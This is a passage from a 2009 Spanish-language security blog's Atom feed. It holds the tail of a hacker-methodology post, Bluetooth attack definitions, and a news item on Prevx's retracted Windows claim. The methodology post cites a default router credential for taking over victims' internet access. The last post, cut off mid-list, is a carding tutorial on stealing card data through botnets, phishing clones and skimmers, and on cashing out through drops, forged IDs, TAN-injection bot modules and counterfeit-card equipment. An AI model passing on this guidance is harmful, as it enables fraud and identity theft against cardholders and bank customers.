ver con la&lt;br /&gt;seguridad, pero que en su texto aparece esa palabra. Buscando por dominio, estaremos buscando&lt;br /&gt;entre todas las direcciones que contienen la palabra “seguridad” en su nombre de dominio:&lt;br /&gt;seguridadempresarial.org, todoenseguridad.com, etc. Netcraft también aloja las estadísticas de uso&lt;br /&gt;de servidores web. En Internet existen básicamente dos programas para servir páginas web: IIS (de&lt;br /&gt;pago y de Microsoft), Apache (el más usado, gratuito y lo hay para Linux y Windows).&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5.- Descubrir Vulnerabilidades y Verificación&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ya que tenemos las versiones de los distintos sistemas y programas, así como la versión del Sistema&lt;br /&gt;operativo, es momento de buscar vulnerabilidades conocidas que afecten a esas versiones (en&lt;br /&gt;especifico) de las aplicaciones. Existen listados en la Red que se mantienen al día con las&lt;br /&gt;vulnerabilidades y explican en detalle el problema y como solucionarlo. Por ejemplo: securitytracker,&lt;br /&gt;en su listado refleja las debilidades de sistemas operativos, programas, routers, etc&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;6.- Verificación de Aplicaciones&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;No solo las aplicaciones en sí pueden ser vulnerables o no. Quizá se puedan estar usando versiones&lt;br /&gt;parchadas11 a las que no afecte ninguna de las vulnerabilidades conocidas hasta el momento. Pero&lt;br /&gt;aún así, puede que sigan siendo vulnerables por la manera en que están dispuestas o configuradas.&lt;br /&gt;Un programa en el directorio incorrecto dentro de un servidor web, los permisos no adecuados&lt;br /&gt;aplicados a un usuario, todo esto puede derivar en grandes problemas de seguridad que podemos&lt;br /&gt;aprovechar, independientemente de que su software se encuentre actualizado.&lt;br /&gt;11 Los bugs (errores de programación) y ciertas vulnerabilidades severas pueden a veces solucionarse con un software especial,&lt;br /&gt;denominado Patch (Parche), que evita el problema o alivia de algún modo sus efectos.&lt;br /&gt;41&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;7.- Comprobación del Router (Ruteador)&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;El router (ruteador) es un servidor de red que mira las direcciones de la red en los paquetes que&lt;br /&gt;recibe antes de decidir si los pasa más adelante. Un router toma decisiones más inteligentes que un&lt;br /&gt;puente sobre los datos que pasa adelante. Un puente sólo decide si pasa o no un paquete, pero un&lt;br /&gt;router puede escoger el mejor camino a lo largo de la red para que el paquete alcance su dirección&lt;br /&gt;de destino. En el contexto TCP/IP, un ruteador es una entrada, una computadora con dos o más&lt;br /&gt;adaptadores de red que está ejecutando algún tipo de software de ruteo IP. Cada adaptador se&lt;br /&gt;conecta a una red física diferente.&lt;br /&gt;Además de dirigir el tráfico, al router se le puede delegar la función de mapear puertos. En el&lt;br /&gt;software que lo compone, se han hallado vulnerabilidades en varias ocasiones que permitían el&lt;br /&gt;acceso a la computadora que lo usaba para salir al Internet. Uno de los problemas más sencillos de&lt;br /&gt;explotar eran las contraseñas por defecto de los routers que la telefónica proporciona a sus clientes.&lt;br /&gt;Si dabas con uno en Internet, tan solo requerías teclear adminttd como username y password para&lt;br /&gt;reconfigurar el acceso a Internet de la víctima.&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;8.- Cotejo de los Sistemas Confiables&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Aquí se comprueba la seguridad desde el interior de la red hacia los servidores. Sirve para comprobar&lt;br /&gt;el nivel de acceso a datos confidenciales que puede obtener un usuario no privilegiado de la red y&lt;br /&gt;hasta qué punto puede comprometer un sistema. Para este punto, se necesita tener acceso directo a&lt;br /&gt;la red y ponerse en el papel de un usuario con ciertos derechos.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;9.- Verificación de Firewalls (Cortafuegos)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;Los Firewalls protegen los puertos y deciden quién y cómo debe conectarse a los servicios que ofrece&lt;br /&gt;el servidor. Después hablaremos sobre los puertos.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;10.- Revisión de los Sistemas de Detección de Intrusos (IDS)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Otra de las herramientas básicas cuando se trata la seguridad en la red. Un IDS es un programa con&lt;br /&gt;utilerías que vigilan la red en busca de ciertos patrones reconocibles de ataques y se les puede&lt;br /&gt;definir el lanzamiento de aplicaciones o distintas acciones al respecto.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;11.- Comprobación de las Medidas de Contención&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Es obligatorio saber cómo administrar de manera óptima los recursos disponibles y conocer quién&lt;br /&gt;tiene acceso a qué tipos de sistemas y además, estar preparados para cualquier desastre. Hay que&lt;br /&gt;mantener un sistema de respaldos de seguridad y recuperación de datos en caso de accidentes.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;12.- Contraseñas&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Después de todos los pasos anteriores, si se han explotado con éxito y se ha obtenido algún dato, lo&lt;br /&gt;ideal sería haber obtenido algún archivo de contraseñas, que, si están cifradas, es necesario&lt;br /&gt;descifrar. Si también se obtiene ese dato, podrías abrir todas las puertas del sistema. Más adelante&lt;br /&gt;hablaremos de los rompedores de contraseñas y acerca de las contraseñas ensombrecidas.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 0);font-size:130%;" &gt;&lt;span style="font-weight: bold;"&gt;13.- Indagación de Denegación de Servicio&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La Denegación de Servicio (DoS) y Denegación de Servicio Distribuida (DDoS) consisten en realizar&lt;br /&gt;peticiones al servidor hasta saturar sus recursos. Un ejemplo de DDoS es un ataque a una página&lt;br /&gt;web. Un ejemplo de DoS es inundar el correo de una persona con un millón de e-mails. Más adelante&lt;br /&gt;en este documento hablaremos de este tipo de ataques.&lt;br /&gt;Nota de Advertencia&lt;br /&gt;Es necesario completar todos los pasos para poder sentirse seguro. Haber encontrado un camino&lt;br /&gt;alterno para entrar en el sistema no significa que sea el único.&lt;br /&gt;&lt;br /&gt;Fuente:El sendero del hacker&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-170393555860708462?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/170393555860708462/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/metodologia-del-hacker.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/170393555860708462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/170393555860708462'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/metodologia-del-hacker.html' title='Metodología del Hacker'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-5761781947607513481</id><published>2009-12-07T21:41:00.001+01:00</published><updated>2009-12-07T21:42:48.981+01:00</updated><title type='text'>BlueHacking - Definiciones y Herramientas</title><content type='html'>&lt;span style="color: red;"&gt;&lt;span style="font-size: 10pt; line-height: 1.3em;"&gt;&lt;b&gt;BlueJacking&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Bluejacking es el envio de mensajes sin permiso a traves de dispositivos con Bluetooth como celulares, PDAs, portatiles y algunos PCs, enviando una vCard, una Nota o un Contacto que usualmente contiene un mensaje el campo del nombre a otro dispositivo Bluetooth a traves del protocolo OBEX.&lt;br /&gt;&lt;br /&gt;Bluetooth tiene un rango muy limitado, usualmente alrededor de 10 metros en algunos celulares, pero en portatiles puede superar los 100 metros con algunos transmisores potentes.&lt;br /&gt;&lt;br /&gt;El Nombre fue originado por un usuario llamado AJACK, quien estando en un banco, busco algun dispositivo Bluetooth encendido y al encontrar un Nokia 7650, le envio un mensaje diciendo “Compra Sony Ericsson”. El lo llamo bluejacking, y asi se ha hecho desde entonces.&lt;br /&gt;&lt;br /&gt;Ajack junto con Droll posteriormente desarrollaron una utlidad para Symbin UIQ llamada SMan que llego a ser la primera utilidad de bluejacking para un smartphone. Ya recientemente se desarrollaron aplicaciones para otras plataformas como java, de las cuales podemos nombrar al Mobiluck, el EasyJack, y una hecha por la misma compañía Nokia llamada Sensor.&lt;br /&gt;&lt;br /&gt;Algunos piensan que el termino bluejacking viene de la palabra Bluetooth y la palabra hijacking. Esto sonaria logico, pero un bluejacker no hace hijack con nada: el o ella unicamente usa una opcion en el envio y el dispositivo recipiente (receptor). Un bluejacker no esta en la capacidad de tomar control de tu telefono o de robar informacion personal. ne Mas bien esta orientado a hacer bromas o molestar a alguien, y tal vez de alli es que viene el termino.&lt;br /&gt;&lt;br /&gt;El Bluejacking es algo gracioso, porque la persona bluejackeada no sabe lo que esta pasando, y piensa que su telefono esta funcionando mal  &lt;img src="http://www.el-hacker.com/foro/Smileys/default/wink.gif" alt="Wink" border="0" /&gt;.&lt;br /&gt;&lt;br /&gt;Usualmente un bluejacker solo envia un mensaje de texto, pero con los telefonos modernos es possible hasta enviar imagines o sonidos tambien.&lt;br /&gt;&lt;br /&gt;Esto del Bluejacking a sido usado para Tecnicas de marketing en algunos centros comerciales quienes se hacen publicidad a traves de este medio.&lt;br /&gt;&lt;br /&gt;Pero con el incremento de los dispositivos con soporte bluetooth , algunos de estos dispositivos (especialmente PDAs y alunos moviles con Symbian) se han vuelto vulnerables, desde ataques de virus, hasta el control total del dispositivo a traves de programas Troyanos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;span style="font-size: 10pt; line-height: 1.3em;"&gt;&lt;b&gt;BlueSnarfing&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Bluesnarfing es el robo de informacion de un dispositivo inalambrico a traves de una conexion Bluetooth, ya sea entre telefonos, portatiles o PDAs.&lt;br /&gt;&lt;br /&gt;Esto permite acceso al calendario, la lista de contactos, correos y mensajes de texto. Bluesnarfing es mucho mas serio en relacion al Bluejacking, pero ambos “explotan” otros dispositivos Bluetooth sin su conocimiento.&lt;br /&gt;&lt;br /&gt;Cualquier dispositivo que tenga encendido el Bluetooth y este se encuentre en Modo Descubierto (osea que puede ser encontrado por otros dispositivos en el rango) puede ser atacado. Apagando esta opcion puede protegerse de la posibilidad de ser Bluesnarfiado. Siendo esto una invasión de la privacidad, el Bluesnarfing es ilegal en algunos paises.&lt;br /&gt;&lt;br /&gt;Dentro de este Rango de Herramientas Encontramos al Mismo BT Info (Super Bluetooth Hack), el BT File Manager, el BT Explorer, Miyux y otra gran variedad de utilidades.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;span style="font-size: 10pt; line-height: 1.3em;"&gt;&lt;b&gt;BlueBugging&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Alguna gente considera el Bluebugging como una forma de Bluesnarfing. Pero la naturaleza de este es muy diferente.&lt;br /&gt;&lt;br /&gt;Blue Bugging fue inventado en 2004, mas o menos un año despues de que empezara el Bluesnarfing. Mientras el bluesnarfing se trata de robar cosas o archivos del dispositivo de la victima, el Blue Bugging hace un trabajo diferente.&lt;br /&gt;&lt;br /&gt;Toma el control del movil de la victima, y por medio de comandos hace lo que el BlueBugger desee (dentro de este rango tenemos al BT Info o Super Bluetooth Hack).&lt;br /&gt;&lt;br /&gt;Para decirlo en palabras faciles, significa que el bluebugger toma el control de tu telefono, y lo usa para enviar mensajes o para hacer una llamada.&lt;br /&gt;&lt;br /&gt;Mientras al principio el bluebugging requeria que el bugger(literalmente) usara un dispositivo previamente acomodado, las nuevas herramientas del bluebugging  han hecho la mayor parte del trabajo, lo que significa que cualquiera con el conocimiento y la herramienta adecuada puede tomar control de tu telefono.&lt;br /&gt;&lt;br /&gt;Las posibilidades y consecuencias de esto, estan a la Imaginación.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Verdana;"&gt;&lt;b&gt;Bluetiming o Toothing&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Podria decirse que es una variante del BlueJacking, la cual se dice, es para promover encuentros del tipo sexual (citas, encuentros y esas cosas) mediante la cual un dispositivo Bluetooth es usado para “descubrir” otros dispositivos bluetooth en el rango, y les envia un mensaje sugestivo, algo asi como: Hablamos ? Donde nos vemos ?.&lt;br /&gt;&lt;br /&gt;Se crea una red de encuentros furtivos con otros dispositivos bluetooth, generalmente en areas con mucha afluencia de publico como Centros Comerciales y parecidos, la cual no solo es para encuentros y charlas, sino tambien para compartir cosas, lo que a logrado que se desarrollen aplicaciones dentro de la categoría MoSoSo (Software para sociabilidad movil, Mobile Social Software en Ingles.) dentro de las cuales podemos contar el Mobiluck, el Bluejack, y los recientes Chat2u o Bluetooth Messenger. Tambien tenemos aquí al “Sensor” de Nokia.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 0, 0);"&gt;&lt;span style="font-size: 10pt; line-height: 1.3em;"&gt;Fuente: BlueJacking Tools&lt;br /&gt;Traducción y Adaptacion by :: Smartgenius ::&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-5761781947607513481?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/5761781947607513481/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/bluehacking-definiciones-y-herramientas.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5761781947607513481'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5761781947607513481'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/bluehacking-definiciones-y-herramientas.html' title='BlueHacking - Definiciones y Herramientas'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-5772911034806018123</id><published>2009-12-06T21:25:00.002+01:00</published><updated>2009-12-06T21:26:02.133+01:00</updated><title type='text'>"Actualizaciones de Windows no ocasionan pantallas negras de la muerte"</title><content type='html'>Una serie de medios informaron la víspera que millones de PC en todo el mundo podían verse afectados por "pantallas negras de la muerte" debido a errores de programación en recientes actualizaciones de Windows. La fuente del informe fue el blog de una desconocida empresa británica de seguridad informática, de nombre Prevx.&lt;br /&gt;&lt;br /&gt;Prevx se refería en concreto a dos actualizaciones de Windows, KB976098, sobre zonas horarias, y KB915597 para Windows Defender, que según su blog modificaba el registro de Windows, resultando en la pantalla negra. La empresa incluso presentaba un procedimiento para solucionar el problema.&lt;br /&gt;&lt;br /&gt;La empresa moderó posteriormente sus categóricas afirmaciones iniciales, diciendo que las condiciones que debían concurrir para generar la pantalla negra en Windows eran "espasmódicas" – quizás queriendo decir "esporádicas" y que es imposible reproducirlas de un PC a otro.&lt;br /&gt;&lt;br /&gt;Luego, en una nueva actualización publicada el 2 de diciembre, Prevx se retracta totalmente.&lt;br /&gt;&lt;br /&gt;En un comunicado, la empresa dice haber "cooperado con Microsoft", para detectar las causas exactas que generan la pantalla negra. Luego confirma que es una situación conocida desde hace varios años y que luego de pruebas exhaustivas se constata que las actualizaciones de Windows nada tienen que ver con el problema.&lt;br /&gt;&lt;br /&gt;"Pedimos disculpas a Microsoft por cualquier inconveniente que pueda haber ocasionado nuestro blog".&lt;br /&gt;&lt;br /&gt;Antes de la aclaración publicada por Prevx, Microsoft había publicado un comunicado donde dice haber investigado la información, y concluido que era "imprecisa".&lt;br /&gt;&lt;br /&gt;"Hemos realizado una acuciosa investigación, constatando que ninguna de nuestras últimas actualizaciones tiene incidencia alguna con el fenómeno descrito en los informes. La empresa que difundió la información no nos había contactado. Hemos informado a la empresa sobre nuestras conclusiones", escribe Microsoft.&lt;br /&gt;&lt;br /&gt;Llama la atención que Microsoft no se refiere a Prevx por su nombre, ni siquiera en el blog de seguridad de Technet.&lt;br /&gt;&lt;br /&gt;&lt;a target="_blank" href="http://www.diarioti.com/gate/n.php?id=25208"&gt; Fuente&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-5772911034806018123?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/5772911034806018123/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/actualizaciones-de-windows-no-ocasionan.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5772911034806018123'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5772911034806018123'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/actualizaciones-de-windows-no-ocasionan.html' title='&quot;Actualizaciones de Windows no ocasionan pantallas negras de la muerte&quot;'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6377791815887799694</id><published>2009-12-05T10:42:00.001+01:00</published><updated>2009-12-05T10:43:48.184+01:00</updated><title type='text'>Tutorial  carding</title><content type='html'>&lt;span style="font-family:Verdana;"&gt;La idea del carding consiste en manipulaciones bancarias con fin de obtener un beneficio que es pagado por alguien que no eres tu.&lt;br /&gt;   &lt;br /&gt;      Para poder practicar el carding nesesitaremos cierto material(datos bancarios, dumps, cc`s etc).   &lt;br /&gt;&lt;br /&gt;            Los datos normalmente se consigen por medios de :&lt;br /&gt;&lt;br /&gt;   BOTNETS&lt;br /&gt;&lt;br /&gt;          Una botnet es una red de ordenadores (de 5000++++) infectados por un programa que hace que el ordenador se conecte a &lt;br /&gt;&lt;br /&gt;un servidor que controla todas las maquinas infectadas. De aqui se pueden sacar Cuentas, Tarjetas, Datos personales etc.&lt;br /&gt;&lt;br /&gt;   Las formas de hacerlo varian de la creatividad del carder. Pero lo mas usual es cambiar el host file de la victima &lt;br /&gt;&lt;br /&gt;redireccionando los principales sitios de pagos a un scam&lt;br /&gt;&lt;br /&gt;*scam : Clon de algun recurso que graba los datos los datos introducidos en los formularios o los envia&lt;br /&gt;&lt;br /&gt;directamente a su dueno.&lt;br /&gt;&lt;br /&gt;   De aqui se pueden sacar datos como informacion de tarjetas y cuentas bancarias.&lt;br /&gt;&lt;br /&gt;   GRABBERS&lt;br /&gt;&lt;br /&gt;            Los grabbers son maquinas que se quedan con los datos de las bandas magneticas y las guardan a un archivo (DUMP). &lt;br /&gt;&lt;br /&gt;Tambien se llaman grabbers los aparatos que se utilizan para grabar esos dumps en cintas magneticas.   Para sacar dumps con &lt;br /&gt;&lt;br /&gt;este tipo de aparatillos es de buena costumbre aprovechar lugares de trabajo. Lo unico que hay que hacer es pasar la tarjeta &lt;br /&gt;&lt;br /&gt;por el lector.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   HACKING E-SHOPS.&lt;br /&gt;&lt;br /&gt;Aqui no hay nada que detallar ya que hay muchisimas tecnicas de hacerlo. Lo que hay que tener en cuenta al elegir&lt;br /&gt;&lt;br /&gt;un e-shop victima es que ha de aceptar tarjetas de credito sin redireccion a la pasarela de pagos del banco de la tarjeta ya &lt;br /&gt;&lt;br /&gt;que estos no guardan datos de la tarjeta en su base... Tiene que ser un sitio con formulario estandar para introducir la &lt;br /&gt;&lt;br /&gt;tarjeta que bi se valida al instante.&lt;br /&gt;&lt;br /&gt;      &lt;br /&gt;    FAKE SHOPS.&lt;br /&gt;&lt;br /&gt;No tiene que ser Fake shop... la idea es crear una tienda virtual donde se pueda pagar con tarjetas de credito. De&lt;br /&gt;&lt;br /&gt;ally hay dos salidas. La primera seria realmente hacer envios al comprador. Y la segunda es por alguna razon cancelar su &lt;br /&gt;&lt;br /&gt;pedido. Mas si antes de cancelar el pedido del todo se pieden datos adicionales como fotocopia del SSN del pasaporte o de la &lt;br /&gt;&lt;br /&gt;tarjeta mucho mejor!&lt;br /&gt;&lt;br /&gt;      &lt;br /&gt;    COMPRAR MATERIAL&lt;br /&gt;&lt;br /&gt;Si lo todo lo mencionado antes le parece demasiado dificil, hay una salida facil... pero hay que pagarla... Pueden&lt;br /&gt;&lt;br /&gt;encontrar material de todo tipo en foros o canales especializados en carding (IRC). no voy a poner enlaces ya que no cuesta &lt;br /&gt;&lt;br /&gt;nada buscar en google. Si tiene conocimientos de ingles o ruso... MUCHO MAS FACIL). Recomendaria negociar en foros ya que en &lt;br /&gt;&lt;br /&gt;IRC hay mas probabilidades de engaño)...&lt;br /&gt;&lt;br /&gt;       &lt;br /&gt;&lt;br /&gt;Termino recordando que la creatividad de la estafa es infinita. lo unico que hay que hacer pensar unpoco en lo que te&lt;br /&gt;&lt;br /&gt;has propuesto y de como consegirlo... y despues... hacerlo)&lt;br /&gt;&lt;br /&gt;             &lt;br /&gt;&lt;br /&gt;         Hay varias formas del carding. Mas abajo intentare mencionar como funccionan las principales formas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;                                                            LAS PRINCIPALES EXPLOTACIONES   &lt;br /&gt;&lt;br /&gt;    Una vez tenemos el material buscamos una manera de aprovecharlo...&lt;br /&gt;&lt;br /&gt;               Una vez que tengas:&lt;br /&gt;&lt;br /&gt;       TARJETAS DE CREDITO:&lt;br /&gt;&lt;br /&gt;    Lo mas comun que se puede hacer con una CC es comprar stuff por internet)...&lt;br /&gt;&lt;br /&gt;            &lt;br /&gt;    los datos mas tipicos que se requieren para pagar con tarjeta son : Cardholdername(nombre del titular), Codigo de &lt;br /&gt;&lt;br /&gt;seguridad (digitos de la parte trasera de la tarjeta), exp_date(fecha de expiracion) &lt;-- casi siempre. y claro esta el numero&lt;br /&gt;&lt;br /&gt;de la tarjeta.&lt;br /&gt;&lt;br /&gt;          Lo ideal para este tipo de compras son sitios que se toman la responsabilidad de retirar el dinero por ellos mismos &lt;br /&gt;&lt;br /&gt;(ejemplo paypal) al recibir la respuesta 00 (tarjeta valida) y no mediante la pasarela de pagos del banco emisor de la &lt;br /&gt;&lt;br /&gt;tarjeta. porque en este caso dependiendo del banco se suelen solicitar datos adicionales (como el pin de la tarjeta, el &lt;br /&gt;&lt;br /&gt;numero de la seguridad social) o directamente mandan sms al numero del titular con un codigo de activacion de la &lt;br /&gt;&lt;br /&gt;transferencia. Asique apuntad siempre los bin's (bank identification number. las primeras 6 cifras de la tarjeta) de sus &lt;br /&gt;&lt;br /&gt;tarjetas que les fueron bien.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      En pocas palabras, buscar algo que nos guste y pagarlo con la tarjeta. Ahora surgen las preguntas "Donde envio el stuff"?&lt;br /&gt;&lt;br /&gt;    Los carders profecionales suelen trabajar con personas de otros paises que les recojen los envios(drops), los venden y les &lt;br /&gt;&lt;br /&gt;envian la mitad del dinero obtenido. Es mala costumbre cardear cosas con las que sabes que al final te quedas tu mismo... ya &lt;br /&gt;&lt;br /&gt;que si te hacen una visita ya tienen pruebas para encerrarte de 3 a 6 años)....&lt;br /&gt;&lt;br /&gt;    Otros envian a conocidos de sus amigos con documentacion falsa... hay quien envia sus compras a casas abandonadas y las &lt;br /&gt;&lt;br /&gt;esperan a la puerta de la casa... si es posible con documentacion falsa tb (un carnet en un idioma desconocido por el &lt;br /&gt;&lt;br /&gt;"cartero" donde figure el nombre del receptor vale. asique media hora de photoshop y listo).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;          TRANSFERIR DINERO A CUENTA BANCARIA.&lt;br /&gt;&lt;br /&gt;   Esto ya es mas avanzado...&lt;br /&gt;&lt;br /&gt;                  Para transferir dinero a una cuenta bancaria hay dos caminos.&lt;br /&gt;&lt;br /&gt;   1.) De una cuenta virtual.&lt;br /&gt;&lt;br /&gt;   2.) De una cuenta bancaria virtual.&lt;br /&gt;&lt;br /&gt; El primer metodo es mas facil pero sacas mas si consiges una transferencia direta de una cuenta bancaria.&lt;br /&gt;&lt;br /&gt;         Es todo lo mismo que con compras por internet... pero aqui hay que complicarse montando un negocio virtual y poder &lt;br /&gt;&lt;br /&gt;proporcionar simpre facturas por si las solicitan.&lt;br /&gt;&lt;br /&gt;    EL donde retirar el dinero? pues lo mismo que con compras de internet. la eleccion es suya.&lt;br /&gt;&lt;br /&gt;un buen ejemplo de un banco virtual podria ser paypal o moneybookers, no voy a entrar en detalles de como trabajar con&lt;br /&gt;&lt;br /&gt;estos bancos ya que es todo una teoria... Pero si investigan dentro de nada consegiran hacer sus primeras transferencias)...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;       El metodo dos consiste en consegir la password del panel de control virtual de una cuenta bancaria real y transferir el &lt;br /&gt;&lt;br /&gt;dinero a sus drops (leer arriba: drops y el como consegir este tipo de cuentas.)&lt;br /&gt;&lt;br /&gt;El problema esque los bancos suelen proporcionar al usuario una tarjeta con numeros junto a un codigo(tanes) que sirve&lt;br /&gt;&lt;br /&gt;de verificacion para hacer una transferencia. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    &lt;br /&gt;    &lt;br /&gt;               Algo tipo :&lt;br /&gt;&lt;br /&gt;   1 = 32&lt;br /&gt;   2 = 1b&lt;br /&gt;   3 = ff&lt;br /&gt;   4 = 1f....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;y al intentar hacer una transferencia el banco le pide los valores de determinados numeros. Solucion : Inject de&lt;br /&gt;&lt;br /&gt;tanes (modulo para bots que reenvia datos que introduce el titular de la cuenta) o buscar bancos sin este tipo de &lt;br /&gt;&lt;br /&gt;protecciones.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;          &lt;br /&gt;          Ahora va lo duro))))&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;         REAL CARDING&lt;br /&gt;&lt;br /&gt;   El real carding consiste en fabricacion de tarjetas de credito. es el metodo mas beneficioso y el mas costoso a la vez... &lt;br /&gt;&lt;br /&gt;ya que el equipo completo para fabricar tarjetas +o- parecidas a las reales puede llegar a costar hasta 10 mil euros.   Pero &lt;br /&gt;&lt;br /&gt;si lo montas viene lo bueno))&lt;br /&gt;&lt;br /&gt;      el equipo nesesario es:&lt;br /&gt;&lt;br /&gt;   Grabber:&lt;br /&gt; Grabador de cintas magneticas. nesesitan uno que pueda grabar como minimo 2 pistas (tracks) ya que la mayoria de las &lt;br /&gt;&lt;br /&gt;tarjetas visa y mc llevan 2 y rara vez 3 pistas.   un aparatito asi cuesta de 500 euros hasta 6000.&lt;br /&gt;&lt;br /&gt;   Emboster:&lt;br /&gt; Es el aparatito que les da el relieve a las tarjetas. (los numeritos del numero de la tarjeta y del nombre del titular). El &lt;br /&gt;&lt;br /&gt;aparatito en realidad no es tan caro (nose el precio exacto porque el mio me lo hize yo))) es bastante facil de hacer. yo &lt;br /&gt;&lt;br /&gt;utilize una plancha y unas plantillas de un mecano de niños &lt;img src="http://www.hackurbano.cl/web/images/smilies/wink.gif" alt="" title="Wink" class="inlineimg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   Card printer:&lt;br /&gt;&lt;br /&gt; pequeña maquina que imprime en las tarjetas de plastico. (el precio no suele subir a mas de 1000ˆ, pero no vale ahorrar en &lt;br /&gt;&lt;br /&gt;ese aparato ya que de el depende como van a quedar las tarjetas).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   y lo ultimo es una 